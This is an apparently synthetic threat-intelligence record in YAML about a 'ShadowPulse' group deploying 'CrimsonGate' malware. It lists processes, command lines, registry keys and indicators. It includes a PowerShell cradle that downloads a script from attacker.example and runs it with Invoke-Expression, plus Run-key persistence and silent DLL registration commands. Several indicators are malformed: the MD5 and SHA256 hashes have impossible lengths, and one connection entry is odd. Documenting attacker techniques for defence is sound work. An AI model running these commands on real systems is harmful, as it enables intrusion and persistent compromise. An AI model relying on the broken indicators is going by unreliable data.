summary: The threat actor known as "ShadowPulse" has been observed deploying a new
  variant of the "CrimsonGate" malware, leveraging Living off the Land Binaries (LOLBins)
  and PowerShell for lateral movement and data exfiltration.
date: '2024-10-27'
authors:
- Alex Johnson
- Maria Rodriguez
attribution: ShadowPulse - suspected APT group with ties to Eastern Europe
malware_families:
- CrimsonGate
TTPs:
  processs:
  - powershell.exe
  - cmd.exe
  - rundll32.exe
  - regsvr32.exe
  - wscript.exe
  commandline:
  - powershell.exe -ExecutionPolicy Bypass -File C:\Temp\initial_payload.ps1
  - cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShadowPulse
    /v "UpdateService" /t REG_SZ /d "C:\Windows\System32\cmd.exe /c start C:\\Temp\\crimsongate.exe"
  - rundll32.exe C:\Windows\System32\mswsock.dll,RegisterApplicationCall -AppId 12345
  - regsvr32.exe /s C:\Temp\malicious_dll.dll
  - wscript.exe "C:\\Temp\\evil.vbs"
  powershell:
  - "$webClient = New-Object System.Net.WebClient; $url = \u201Chttp://attacker.example/stage1.ps1\u201D\
    ; $scriptContent = $webClient.DownloadString($url); Invoke-Expression $scriptContent"
  - "function Download-File {param([string]$url,[string]$destination) ;$webclient\
    \ = New-Object System.Net.WebClient; $webclient.DownloadFile($url, $destination)}\
    \ Download-File \u201Chttp://attacker.example/crimsongate_config.json\u201D \"\
    C:\\Temp\\crimsongate_config.json\""
  - Get-Process | Where-Object {$_.Hashes -like "*malicious*"} | Stop-Process -Force
  scripting_engine:
  - VBScript (evil.vbs)
  registry_keys:
  - HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShadowPulse
  - HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  - HKLM\SYSTEM\ControlSet001\Services\EvilService
  network_connections:
  - powershell.exe:53 -> attacker.example:80
  - crimsongate.exe:443 -> attacker2.example:443
  file_modifications:
  - C:\Temp\initial_payload.ps1 (created)
  - C:\Windows\System32\cmd.exe (modified)
  - C:\Temp\crimsongate.exe (created)
  - C:\Temp\malicious_dll.dll (created)
  - C:\Temp\evil.vbs (created)
  - C:\Temp\crimsongate_config.json (created)
  persistence:
  - Registry Run key modification
  - Scheduled Task creation (details not provided in this advisory)
  pipes:
  - ShadowPulsePipe
  process_relations:
  - powershell.exe -> cmd.exe -> regsvr32.exe
  - wscript.exe -> powershell.exe
IOCs:
  hashes:
  - 'SHA256: a1b2c3d4e5f678901234567890abcdef01234567890abcdef0123456789'
  - 'MD5: 0a1b2c3d4e5f678901234567890abcdef01234567890abcdef0123456789'
  ips:
  - 192.0.2.10
  - 203.0.113.25
  domains:
  - attacker.example
  - attacker2.example
  urls:
  - http://attacker.example/stage1.ps1
  - http://attacker.example/crimsongate_config.json
reference: https://www.nccgroup.com/us/research-blog/ncc-group-s-2024-annual-research-report/
file_creation_date: May 09, 2025
